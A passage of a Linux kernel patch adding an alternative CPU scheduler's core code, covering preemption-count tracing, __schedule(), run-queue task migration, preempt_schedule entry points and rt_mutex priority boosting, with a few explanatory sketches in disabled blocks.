++	return 0;
++}
++
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_tick_start(int cpu) { }
++static inline void sched_tick_stop(int cpu) { }
++#endif
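++
++/*
++ * For illustration, a user-space model of the OFFLINE/OFFLINING/RUNNING
++ * state machine above, using C11 atomics (sketch only; the helper mimics
++ * the kernel's atomic_fetch_add_unless(), everything else is a direct
++ * transcription of sched_tick_start()/stop()/remote()):
++ */
++#if 0	/* compile stand-alone: cc -std=c11 tick_state.c && ./a.out */
++#include <assert.h>
++#include <stdatomic.h>
++
++#define OFFLINE		0
++#define OFFLINING	1
++#define RUNNING		2
++
++/* Add @a to @v unless it currently holds @u; return the old value. */
++static int fetch_add_unless(atomic_int *v, int a, int u)
++{
++	int old = atomic_load(v);
++	do {
++		if (old == u)
++			break;
++	} while (!atomic_compare_exchange_weak(v, &old, old + a));
++	return old;
++}
++
++int main(void)
++{
++	atomic_int state = OFFLINE;
++
++	/* sched_tick_start(): only OFFLINE -> RUNNING queues new work */
++	assert(atomic_exchange(&state, RUNNING) == OFFLINE);
++
++	/* sched_tick_remote() while RUNNING: no transition, requeue */
++	assert(fetch_add_unless(&state, -1, RUNNING) == RUNNING);
++	assert(atomic_load(&state) == RUNNING);
++
++	/* sched_tick_stop(): RUNNING -> OFFLINING */
++	assert(atomic_exchange(&state, OFFLINING) == RUNNING);
++
++	/* next sched_tick_remote(): OFFLINING -> OFFLINE, no requeue */
++	assert(fetch_add_unless(&state, -1, RUNNING) == OFFLINING);
++	assert(atomic_load(&state) == OFFLINE);
++	return 0;
++}
++#endif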
++
++#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
++				defined(CONFIG_PREEMPT_TRACER))
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just disabled preemption. Start timing the latency.
++ */
++static inline void preempt_latency_start(int val)
++{
++	if (preempt_count() == val) {
++		unsigned long ip = get_lock_parent_ip();
++#ifdef CONFIG_DEBUG_PREEMPT
++		current->preempt_disable_ip = ip;
++#endif
++		trace_preempt_off(CALLER_ADDR0, ip);
++	}
++}
++
++void preempt_count_add(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
++		return;
++#endif
++	__preempt_count_add(val);
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Spinlock count overflowing soon?
++	 */
++	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
++				PREEMPT_MASK - 10);
++#endif
++	preempt_latency_start(val);
++}
++EXPORT_SYMBOL(preempt_count_add);
++NOKPROBE_SYMBOL(preempt_count_add);
++
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just enabled preemption. Stop timing the latency.
++ */
++static inline void preempt_latency_stop(int val)
++{
++	if (preempt_count() == val)
++		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
++}
++
++void preempt_count_sub(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
++		return;
++	/*
++	 * Is the spinlock portion underflowing?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
++			!(preempt_count() & PREEMPT_MASK)))
++		return;
++#endif
++
++	preempt_latency_stop(val);
++	__preempt_count_sub(val);
++}
++EXPORT_SYMBOL(preempt_count_sub);
++NOKPROBE_SYMBOL(preempt_count_sub);
++
++#else
++static inline void preempt_latency_start(int val) { }
++static inline void preempt_latency_stop(int val) { }
++#endif
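++
++/*
++ * For illustration, why preempt_latency_start/stop() compare against @val:
++ * only the outermost disable/enable pair starts and stops the timing, while
++ * nested sections leave it alone. A minimal single-threaded model (sketch
++ * only; "timing" stands in for trace_preempt_off/on):
++ */
++#if 0	/* compile stand-alone: cc preempt_latency.c && ./a.out */
++#include <assert.h>
++
++static int preempt_count;
++static int timing;
++
++static void count_add(int val)
++{
++	preempt_count += val;
++	if (preempt_count == val)	/* 0 -> val: just disabled */
++		timing = 1;
++}
++
++static void count_sub(int val)
++{
++	if (preempt_count == val)	/* val -> 0: about to enable */
++		timing = 0;
++	preempt_count -= val;
++}
++
++int main(void)
++{
++	count_add(1);			/* outer disable: timing starts */
++	assert(timing == 1);
++	count_add(1);			/* nested disable: no restart */
++	count_sub(1);			/* nested enable: still timing */
++	assert(timing == 1);
++	count_sub(1);			/* outer enable: timing stops */
++	assert(timing == 0 && preempt_count == 0);
++	return 0;
++}
++#endif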
++
++static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	return p->preempt_disable_ip;
++#else
++	return 0;
++#endif
++}
++
++/*
++ * Print scheduling while atomic bug:
++ */
++static noinline void __schedule_bug(struct task_struct *prev)
++{
++	/* Save this before calling printk(), since that will clobber it */
++	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
++
++	if (oops_in_progress)
++		return;
++
++	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
++		prev->comm, prev->pid, preempt_count());
++
++	debug_show_held_locks(prev);
++	print_modules();
++	if (irqs_disabled())
++		print_irqtrace_events(prev);
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
++	    && in_atomic_preempt_off()) {
++		pr_err("Preemption disabled at:");
++		print_ip_sym(KERN_ERR, preempt_disable_ip);
++	}
++	if (panic_on_warn)
++		panic("scheduling while atomic\n");
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++
++/*
++ * Various schedule()-time debugging checks and statistics:
++ */
++static inline void schedule_debug(struct task_struct *prev, bool preempt)
++{
++#ifdef CONFIG_SCHED_STACK_END_CHECK
++	if (task_stack_end_corrupted(prev))
++		panic("corrupted stack end detected inside scheduler\n");
++
++	if (task_scs_end_corrupted(prev))
++		panic("corrupted shadow stack detected inside scheduler\n");
++#endif
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
++		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
++			prev->comm, prev->pid, prev->non_block_count);
++		dump_stack();
++		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++	}
++#endif
++
++	if (unlikely(in_atomic_preempt_off())) {
++		__schedule_bug(prev);
++		preempt_count_set(PREEMPT_DISABLED);
++	}
++	rcu_sleep_check();
++	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
++
++	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
++
++	schedstat_inc(this_rq()->sched_count);
++}
++
++/*
++ * Compile time debug macro
++ * #define ALT_SCHED_DEBUG
++ */
++
++#ifdef ALT_SCHED_DEBUG
++void alt_sched_debug(void)
++{
++	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
++	       sched_rq_pending_mask.bits[0],
++	       sched_idle_mask->bits[0],
++	       sched_sg_idle_mask.bits[0]);
++}
++#else
++inline void alt_sched_debug(void) {}
++#endif
++
++#ifdef	CONFIG_SMP
++
++#ifdef CONFIG_PREEMPT_RT
++#define SCHED_NR_MIGRATE_BREAK 8
++#else
++#define SCHED_NR_MIGRATE_BREAK 32
++#endif
++
++const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
++
++/*
++ * Migrate pending tasks in @rq to @dest_cpu
++ */
++static inline int
++migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
++{
++	struct task_struct *p, *skip = rq->curr;
++	int nr_migrated = 0;
++	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
++
++	while (skip != rq->idle && nr_tries &&
++	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
++		skip = sched_rq_next_task(p, rq);
++		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
++			__SCHED_DEQUEUE_TASK(p, rq, 0);
++			set_task_cpu(p, dest_cpu);
++			sched_task_sanity_check(p, dest_rq);
++			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
++			nr_migrated++;
++		}
++		nr_tries--;
++	}
++
++	return nr_migrated;
++}
++
++static inline int take_other_rq_tasks(struct rq *rq, int cpu)
++{
++	struct cpumask *topo_mask, *end_mask;
++
++	if (unlikely(!rq->online))
++		return 0;
++
++	if (cpumask_empty(&sched_rq_pending_mask))
++		return 0;
++
++	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
++	do {
++		int i;
++		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
++			int nr_migrated;
++			struct rq *src_rq;
++
++			src_rq = cpu_rq(i);
++			if (!do_raw_spin_trylock(&src_rq->lock))
++				continue;
++			spin_acquire(&src_rq->lock.dep_map,
++				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
++
++			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
++				src_rq->nr_running -= nr_migrated;
++				if (src_rq->nr_running < 2)
++					cpumask_clear_cpu(i, &sched_rq_pending_mask);
++
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
++				rq->nr_running += nr_migrated;
++				if (rq->nr_running > 1)
++					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
++
++				cpufreq_update_util(rq, 0);
++
++				return 1;
++			}
++
++			spin_release(&src_rq->lock.dep_map, _RET_IP_);
++			do_raw_spin_unlock(&src_rq->lock);
++		}
++	} while (++topo_mask < end_mask);
++
++	return 0;
++}
++#endif
++
++/*
++ * Timeslices below RESCHED_NS are considered as good as expired as there's no
++ * point rescheduling when there's so little time left.
++ */
++static inline void check_curr(struct task_struct *p, struct rq *rq)
++{
++	if (unlikely(rq->idle == p))
++		return;
++
++	update_curr(rq, p);
++
++	if (p->time_slice < RESCHED_NS)
++		time_slice_expired(p, rq);
++}
++
++static inline struct task_struct *
++choose_next_task(struct rq *rq, int cpu)
++{
++	struct task_struct *next;
++
++	if (unlikely(rq->skip)) {
++		next = rq_runnable_task(rq);
++		if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++			if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++				rq->skip = NULL;
++				schedstat_inc(rq->sched_goidle);
++				return next;
++#ifdef	CONFIG_SMP
++			}
++			next = rq_runnable_task(rq);
++#endif
++		}
++		rq->skip = NULL;
++#ifdef CONFIG_HIGH_RES_TIMERS
++		hrtick_start(rq, next->time_slice);
++#endif
++		return next;
++	}
++
++	next = sched_rq_first_task(rq);
++	if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++		if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++			schedstat_inc(rq->sched_goidle);
++			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
++			return next;
++#ifdef	CONFIG_SMP
++		}
++		next = sched_rq_first_task(rq);
++#endif
++	}
++#ifdef CONFIG_HIGH_RES_TIMERS
++	hrtick_start(rq, next->time_slice);
++#endif
++	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
++	 * next);*/
++	return next;
++}
++
++/*
++ * Constants for the sched_mode argument of __schedule().
++ *
++ * The mode argument allows RT enabled kernels to differentiate a
++ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
++ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
++ * optimize the AND operation out and just check for zero.
++ */
++#define SM_NONE			0x0
++#define SM_PREEMPT		0x1
++#define SM_RTLOCK_WAIT		0x2
++
++#ifndef CONFIG_PREEMPT_RT
++# define SM_MASK_PREEMPT	(~0U)
++#else
++# define SM_MASK_PREEMPT	SM_PREEMPT
++#endif
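++
++/*
++ * A compile-time sketch of the optimization claimed above: with
++ * SM_MASK_PREEMPT == ~0U the AND is an identity, so on !PREEMPT_RT kernels
++ * (sched_mode & SM_MASK_PREEMPT) reduces to a plain zero test of sched_mode.
++ */
++#ifndef CONFIG_PREEMPT_RT
++_Static_assert((SM_NONE & SM_MASK_PREEMPT) == SM_NONE &&
++	       (SM_PREEMPT & SM_MASK_PREEMPT) == SM_PREEMPT &&
++	       (SM_RTLOCK_WAIT & SM_MASK_PREEMPT) == SM_RTLOCK_WAIT,
++	       "SM_MASK_PREEMPT must be transparent for !PREEMPT_RT");
++#endif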
++
++/*
++ * schedule() is the main scheduler function.
++ *
++ * The main means of driving the scheduler and thus entering this function are:
++ *
++ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
++ *
++ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
++ *      paths. For example, see arch/x86/entry_64.S.
++ *
++ *      To drive preemption between tasks, the scheduler sets the flag in timer
++ *      interrupt handler scheduler_tick().
++ *
++ *   3. Wakeups don't really cause entry into schedule(). They add a
++ *      task to the run-queue and that's it.
++ *
++ *      Now, if the new task added to the run-queue preempts the current
++ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
++ *      called on the nearest possible occasion:
++ *
++ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
++ *
++ *         - in syscall or exception context, at the next outermost
++ *           preempt_enable(). (this might be as soon as the wake_up()'s
++ *           spin_unlock()!)
++ *
++ *         - in IRQ context, return from interrupt-handler to
++ *           preemptible context
++ *
++ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
++ *         then at the next:
++ *
++ *          - cond_resched() call
++ *          - explicit schedule() call
++ *          - return from syscall or exception to user-space
++ *          - return from interrupt-handler to user-space
++ *
++ * WARNING: must be called with preemption disabled!
++ */
++static void __sched notrace __schedule(unsigned int sched_mode)
++{
++	struct task_struct *prev, *next;
++	unsigned long *switch_count;
++	unsigned long prev_state;
++	struct rq *rq;
++	int cpu;
++	int deactivated = 0;
++
++	cpu = smp_processor_id();
++	rq = cpu_rq(cpu);
++	prev = rq->curr;
++
++	schedule_debug(prev, !!sched_mode);
++
++	/* bypass the sched_feat(HRTICK) check, which Alt schedule FW doesn't support */
++	hrtick_clear(rq);
++
++	local_irq_disable();
++	rcu_note_context_switch(!!sched_mode);
++
++	/*
++	 * Make sure that signal_pending_state()->signal_pending() below
++	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
++	 * done by the caller to avoid the race with signal_wake_up():
++	 *
++	 * __set_current_state(@state)		signal_wake_up()
++	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
++	 *					  wake_up_state(p, state)
++	 *   LOCK rq->lock			    LOCK p->pi_state
++	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
++	 *     if (signal_pending_state())	    if (p->state & @state)
++	 *
++	 * Also, the membarrier system call requires a full memory barrier
++	 * after coming from user-space, before storing to rq->curr.
++	 */
++	raw_spin_lock(&rq->lock);
++	smp_mb__after_spinlock();
++
++	update_rq_clock(rq);
++
++	switch_count = &prev->nivcsw;
++	/*
++	 * We must load prev->state once (task_struct::state is volatile), such
++	 * that we form a control dependency vs deactivate_task() below.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
++		if (signal_pending_state(prev_state, prev)) {
++			WRITE_ONCE(prev->__state, TASK_RUNNING);
++		} else {
++			prev->sched_contributes_to_load =
++				(prev_state & TASK_UNINTERRUPTIBLE) &&
++				!(prev_state & TASK_NOLOAD) &&
++				!(prev_state & TASK_FROZEN);
++
++			if (prev->sched_contributes_to_load)
++				rq->nr_uninterruptible++;
++
++			/*
++			 * __schedule()			ttwu()
++			 *   prev_state = prev->state;    if (p->on_rq && ...)
++			 *   if (prev_state)		    goto out;
++			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
++			 *				  p->state = TASK_WAKING
++			 *
++			 * Where __schedule() and ttwu() have matching control dependencies.
++			 *
++			 * After this, schedule() must not care about p->state any more.
++			 */
++			sched_task_deactivate(prev, rq);
++			deactivate_task(prev, rq);
++			deactivated = 1;
++
++			if (prev->in_iowait) {
++				atomic_inc(&rq->nr_iowait);
++				delayacct_blkio_start();
++			}
++		}
++		switch_count = &prev->nvcsw;
++	}
++
++	check_curr(prev, rq);
++
++	next = choose_next_task(rq, cpu);
++	clear_tsk_need_resched(prev);
++	clear_preempt_need_resched();
++#ifdef CONFIG_SCHED_DEBUG
++	rq->last_seen_need_resched_ns = 0;
++#endif
++
++	if (likely(prev != next)) {
++		if (deactivated)
++			update_sched_preempt_mask(rq);
++		next->last_ran = rq->clock_task;
++		rq->last_ts_switch = rq->clock;
++
++		rq->nr_switches++;
++		/*
++		 * RCU users of rcu_dereference(rq->curr) may not see
++		 * changes to task_struct made by pick_next_task().
++		 */
++		RCU_INIT_POINTER(rq->curr, next);
++		/*
++		 * The membarrier system call requires each architecture
++		 * to have a full memory barrier after updating
++		 * rq->curr, before returning to user-space.
++		 *
++		 * Here are the schemes providing that barrier on the
++		 * various architectures:
++		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
++		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
++		 * - finish_lock_switch() for weakly-ordered
++		 *   architectures where spin_unlock is a full barrier,
++		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
++		 *   is a RELEASE barrier),
++		 */
++		++*switch_count;
++
++		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
++
++		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
++
++		/* Also unlocks the rq: */
++		rq = context_switch(rq, prev, next);
++	} else {
++		__balance_callbacks(rq);
++		raw_spin_unlock_irq(&rq->lock);
++	}
++
++#ifdef CONFIG_SCHED_SMT
++	sg_balance(rq);
++#endif
++}
++
++void __noreturn do_task_dead(void)
++{
++	/* Causes final put_task_struct in finish_task_switch(): */
++	set_special_state(TASK_DEAD);
++
++	/* Tell freezer to ignore us: */
++	current->flags |= PF_NOFREEZE;
++
++	__schedule(SM_NONE);
++	BUG();
++
++	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
++	for (;;)
++		cpu_relax();
++}
++
++static inline void sched_submit_work(struct task_struct *tsk)
++{
++	unsigned int task_flags;
++
++	if (task_is_running(tsk))
++		return;
++
++	task_flags = tsk->flags;
++	/*
++	 * If a worker goes to sleep, notify and ask workqueue whether it
++	 * wants to wake up a task to maintain concurrency.
++	 */
++	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (task_flags & PF_WQ_WORKER)
++			wq_worker_sleeping(tsk);
++		else
++			io_wq_worker_sleeping(tsk);
++	}
++
++	/*
++	 * spinlock and rwlock must not flush block requests.  This will
++	 * deadlock if the callback attempts to acquire a lock which is
++	 * already acquired.
++	 */
++	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
++
++	/*
++	 * If we are going to sleep and we have plugged IO queued,
++	 * make sure to submit it to avoid deadlocks.
++	 */
++	blk_flush_plug(tsk->plug, true);
++}
++
++static void sched_update_worker(struct task_struct *tsk)
++{
++	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (tsk->flags & PF_WQ_WORKER)
++			wq_worker_running(tsk);
++		else
++			io_wq_worker_running(tsk);
++	}
++}
++
++asmlinkage __visible void __sched schedule(void)
++{
++	struct task_struct *tsk = current;
++
++	sched_submit_work(tsk);
++	do {
++		preempt_disable();
++		__schedule(SM_NONE);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++	sched_update_worker(tsk);
++}
++EXPORT_SYMBOL(schedule);
++
++/*
++ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
++ * state (i.e. has scheduled out non-voluntarily) by making sure that all
++ * tasks have either left the run queue or have gone into user space.
++ * As idle tasks do not do either, they must not ever be preempted
++ * (schedule out non-voluntarily).
++ *
++ * schedule_idle() is similar to schedule_preempt_disabled() except that it
++ * never enables preemption because it does not call sched_submit_work().
++ */
++void __sched schedule_idle(void)
++{
++	/*
++	 * As this skips calling sched_submit_work(), which the idle task does
++	 * regardless because that function is a nop when the task is in a
++	 * TASK_RUNNING state, make sure this isn't used someplace that the
++	 * current task can be in any other state. Note, idle is always in the
++	 * TASK_RUNNING state.
++	 */
++	WARN_ON_ONCE(current->__state);
++	do {
++		__schedule(SM_NONE);
++	} while (need_resched());
++}
++
++#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
++asmlinkage __visible void __sched schedule_user(void)
++{
++	/*
++	 * If we come here after a random call to set_need_resched(),
++	 * or we have been woken up remotely but the IPI has not yet arrived,
++	 * we haven't yet exited the RCU idle mode. Do it here manually until
++	 * we find a better solution.
++	 *
++	 * NB: There are buggy callers of this function.  Ideally we
++	 * should warn if prev_state != CONTEXT_USER, but that will trigger
++	 * too frequently to make sense yet.
++	 */
++	enum ctx_state prev_state = exception_enter();
++	schedule();
++	exception_exit(prev_state);
++}
++#endif
++
++/**
++ * schedule_preempt_disabled - called with preemption disabled
++ *
++ * Returns with preemption disabled. Note: preempt_count must be 1
++ */
++void __sched schedule_preempt_disabled(void)
++{
++	sched_preempt_enable_no_resched();
++	schedule();
++	preempt_disable();
++}
++
++#ifdef CONFIG_PREEMPT_RT
++void __sched notrace schedule_rtlock(void)
++{
++	do {
++		preempt_disable();
++		__schedule(SM_RTLOCK_WAIT);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++}
++NOKPROBE_SYMBOL(schedule_rtlock);
++#endif
++
++static void __sched notrace preempt_schedule_common(void)
++{
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		__schedule(SM_PREEMPT);
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++
++		/*
++		 * Check again in case we missed a preemption opportunity
++		 * between schedule and now.
++		 */
++	} while (need_resched());
++}
++
++#ifdef CONFIG_PREEMPTION
++/*
++ * This is the entry point to schedule() from in-kernel preemption
++ * off of preempt_enable.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule(void)
++{
++	/*
++	 * If there is a non-zero preempt_count or interrupts are disabled,
++	 * we do not want to preempt the current task. Just return..
++	 */
++	if (likely(!preemptible()))
++		return;
++
++	preempt_schedule_common();
++}
++NOKPROBE_SYMBOL(preempt_schedule);
++EXPORT_SYMBOL(preempt_schedule);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_dynamic_enabled
++#define preempt_schedule_dynamic_enabled	preempt_schedule
++#define preempt_schedule_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
++void __sched notrace dynamic_preempt_schedule(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
++		return;
++	preempt_schedule();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule);
++EXPORT_SYMBOL(dynamic_preempt_schedule);
++#endif
++#endif
++
++/**
++ * preempt_schedule_notrace - preempt_schedule called by tracing
++ *
++ * The tracing infrastructure uses preempt_enable_notrace to prevent
++ * recursion and tracing preempt enabling caused by the tracing
++ * infrastructure itself. But as tracing can happen in areas coming
++ * from userspace or just about to enter userspace, a preempt enable
++ * can occur before user_exit() is called. This will cause the scheduler
++ * to be called when the system is still in usermode.
++ *
++ * To prevent this, the preempt_enable_notrace will use this function
++ * instead of preempt_schedule() to exit user context if needed before
++ * calling the scheduler.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
++{
++	enum ctx_state prev_ctx;
++
++	if (likely(!preemptible()))
++		return;
++
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		/*
++		 * Needs preempt disabled in case user_exit() is traced
++		 * and the tracer calls preempt_enable_notrace() causing
++		 * an infinite recursion.
++		 */
++		prev_ctx = exception_enter();
++		__schedule(SM_PREEMPT);
++		exception_exit(prev_ctx);
++
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++	} while (need_resched());
++}
++EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_notrace_dynamic_enabled
++#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
++#define preempt_schedule_notrace_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
++void __sched notrace dynamic_preempt_schedule_notrace(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
++		return;
++	preempt_schedule_notrace();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
++EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
++#endif
++#endif
++
++#endif /* CONFIG_PREEMPTION */
++
++/*
++ * This is the entry point to schedule() from kernel preemption
++ * off of irq context.
++ * Note that this is called and returns with irqs disabled. This will
++ * protect us against recursive calling from irq.
++ */
++asmlinkage __visible void __sched preempt_schedule_irq(void)
++{
++	enum ctx_state prev_state;
++
++	/* Catch callers which need to be fixed */
++	BUG_ON(preempt_count() || !irqs_disabled());
++
++	prev_state = exception_enter();
++
++	do {
++		preempt_disable();
++		local_irq_enable();
++		__schedule(SM_PREEMPT);
++		local_irq_disable();
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++
++	exception_exit(prev_state);
++}
++
++int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
++			  void *key)
++{
++	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
++	return try_to_wake_up(curr->private, mode, wake_flags);
++}
++EXPORT_SYMBOL(default_wake_function);
++
++static inline void check_task_changed(struct task_struct *p, struct rq *rq)
++{
++	int idx;
++
++	/* Trigger resched if task sched_prio has been modified. */
++	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
++		requeue_task(p, rq, idx);
++		check_preempt_curr(rq);
++	}
++}
++
++static void __setscheduler_prio(struct task_struct *p, int prio)
++{
++	p->prio = prio;
++}
++
++#ifdef CONFIG_RT_MUTEXES
++
++static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
++{
++	if (pi_task)
++		prio = min(prio, pi_task->prio);
++
++	return prio;
++}
++
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	struct task_struct *pi_task = rt_mutex_get_top_task(p);
++
++	return __rt_effective_prio(pi_task, prio);
++}
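++
++/*
++ * Worked example of the boost arithmetic above (kernel prio values, where
++ * lower means higher priority): a nice-0 normal task sits at kernel prio
++ * 120; if its top waiter is a SCHED_FIFO prio-50 task (kernel prio
++ * 99 - 50 = 49), then
++ *
++ *	rt_effective_prio(p, 120) = min(120, 49) = 49
++ *
++ * and the lock holder runs at the waiter's priority until it deboosts.
++ */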
++
++/*
++ * rt_mutex_setprio - set the current priority of a task
++ * @p: task to boost
++ * @pi_task: donor task
++ *
++ * This function changes the 'effective' priority of a task. It does
++ * not touch ->normal_prio like __setscheduler().
++ *
++ * Used by the rt_mutex code to implement priority inheritance
++ * logic. Call site only calls if the priority of the task changed.
++ */
++void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
++{
++	int prio;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	/* XXX used to be waiter->prio, not waiter->task->prio */
++	prio = __rt_effective_prio(pi_task, p->normal_prio);
++
++	/*
++	 * If nothing changed; bail early.
++	 */
++	if (p->pi_top_task == pi_task && prio == p->prio)
++		return;
++
++	rq = __task_access_lock(p, &lock);
++	update_rq_clock(rq);
++	/*
++	 * Set under pi_lock && rq->lock, such that the value can be used under
++	 * either lock.
++	 *
++	 * Note that there is a lot of trickiness in making this pointer cache
++	 * work right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
++	 * ensure a task is de-boosted (pi_task is set to NULL) before the
++	 * task is allowed to run again (and can exit). This ensures the pointer
++	 * points to a blocked task -- which guarantees the task is present.
++	 */
++	p->pi_top_task = pi_task;
++
++	/*
++	 * For FIFO/RR we only need to set prio, if that matches we're done.
++	 */
++	if (prio == p->prio)
++		goto out_unlock;
++
++	/*
++	 * Idle task boosting is a no-no in general. There is one
++	 * exception, when PREEMPT_RT and NOHZ is active:
